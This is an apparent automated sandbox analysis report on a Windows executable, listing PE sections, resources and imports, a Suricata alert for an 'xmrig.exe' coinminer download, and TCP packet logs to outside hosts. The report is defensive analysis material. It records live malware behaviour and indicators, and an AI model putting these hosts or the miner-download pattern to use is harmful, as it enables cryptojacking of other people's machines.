                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                Imports

                                DLLImport
                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-05T01:45:44.734072+02002829056ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download2192.168.2.449739140.82.121.3443TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 5, 2024 01:45:34.981188059 CEST4973081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:45:34.986562967 CEST8149730135.181.7.171192.168.2.4
                                Sep 5, 2024 01:45:34.986639023 CEST4973081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:45:34.996964931 CEST4973081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:45:35.001741886 CEST8149730135.181.7.171192.168.2.4
                                Sep 5, 2024 01:45:42.574326992 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:42.574393034 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:42.574456930 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:42.585454941 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:42.585477114 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.139022112 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.139092922 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:43.144623041 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:43.144640923 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.144840002 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.260523081 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:43.308506012 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.370791912 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.370863914 CEST44349737172.67.19.24192.168.2.4
                                Sep 5, 2024 01:45:43.370965004 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:43.380166054 CEST49737443192.168.2.4172.67.19.24
                                Sep 5, 2024 01:45:43.617737055 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.617811918 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:43.617894888 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.618335962 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.618366003 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:43.618416071 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.624245882 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.624260902 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:43.624578953 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:43.624596119 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.279459953 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.279551029 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.281735897 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.281824112 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.286530972 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.286535978 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.286744118 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.288376093 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.289084911 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.289102077 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.289334059 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.290858984 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.332500935 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.336508989 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732105017 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732177973 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732212067 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732228994 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.732244015 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732259035 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.732886076 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732928991 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732933998 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.732942104 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.732985020 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.732990980 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.733829021 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.733870983 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.733877897 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734092951 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734309912 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734371901 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.734390974 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734467983 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.734843969 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734952927 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.734982014 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.735001087 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.735006094 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.735155106 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.735332012 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.788187981 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.788206100 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.820394993 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.820439100 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.820447922 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.823090076 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.823133945 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.823139906 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.823548079 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.823612928 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.823618889 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.824042082 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.824062109 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.824088097 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.824107885 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.824115038 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.824124098 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825057030 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825089931 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825120926 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825134993 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825145006 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825176954 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825746059 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825779915 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825788975 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825793982 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825812101 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825833082 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825834990 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825836897 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825854063 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825865030 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825938940 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825951099 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.825958014 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.825999975 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.826006889 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826124907 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826165915 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.826170921 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826714039 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826740026 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826761961 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.826761961 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826771975 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.826811075 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.827397108 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.827429056 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.827441931 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.827446938 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.827493906 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.827992916 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.828118086 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.828162909 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.828171968 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.828177929 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.828246117 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.828979015 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.829039097 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.829082966 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.829111099 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.829133034 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.829139948 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.829159975 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.882004023 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.908739090 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.908776999 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.908859968 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.908869982 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.908946037 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.911227942 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.911286116 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.911320925 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.911335945 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.911343098 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.911392927 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.913916111 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914045095 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914072037 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914087057 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.914093971 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914167881 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.914174080 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914469004 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914500952 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914546013 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.914552927 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914680958 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.914872885 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914923906 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914952993 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.914968014 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.914974928 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915014982 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.915249109 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915302038 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915345907 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.915352106 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915388107 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915420055 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915435076 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.915441036 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915478945 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915492058 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.915498018 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.915535927 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.915543079 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916222095 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916266918 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.916274071 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916304111 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916336060 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916342974 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.916349888 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916385889 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916390896 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.916398048 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916435003 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.916435957 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916446924 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.916488886 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.917182922 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917237043 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917268991 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917287111 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.917293072 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917368889 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.917373896 CEST44349740140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917393923 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917507887 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917587996 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.917608976 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917793989 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917831898 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917874098 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.917887926 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.917926073 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.918180943 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918251991 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918286085 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918313980 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.918325901 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918365955 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.918368101 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918379068 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.918425083 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.918864965 CEST49740443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.919009924 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919073105 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919107914 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919137001 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.919140100 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919148922 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919176102 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.919223070 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919291973 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.919318914 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919913054 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919969082 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.919974089 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.919981956 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920027018 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.920037985 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920082092 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920130968 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920131922 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.920144081 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920273066 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.920828104 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920919895 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920948029 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920979023 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.920988083 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.920994043 CEST44349739140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.921021938 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.921047926 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.921047926 CEST49739443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.922200918 CEST49742443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.922216892 CEST44349742140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:44.922281027 CEST49742443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.924310923 CEST49742443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:44.924321890 CEST44349742140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:45.598227978 CEST44349742140.82.121.3192.168.2.4
                                Sep 5, 2024 01:45:45.647578001 CEST49742443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:45.886850119 CEST49742443192.168.2.4140.82.121.3
                                Sep 5, 2024 01:45:56.390265942 CEST8149730135.181.7.171192.168.2.4
                                Sep 5, 2024 01:45:56.390353918 CEST4973081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:45:56.540783882 CEST4973081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:01.556301117 CEST4975081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:01.561194897 CEST8149750135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:01.561281919 CEST4975081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:01.561537981 CEST4975081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:01.566227913 CEST8149750135.181.7.171192.168.2.4
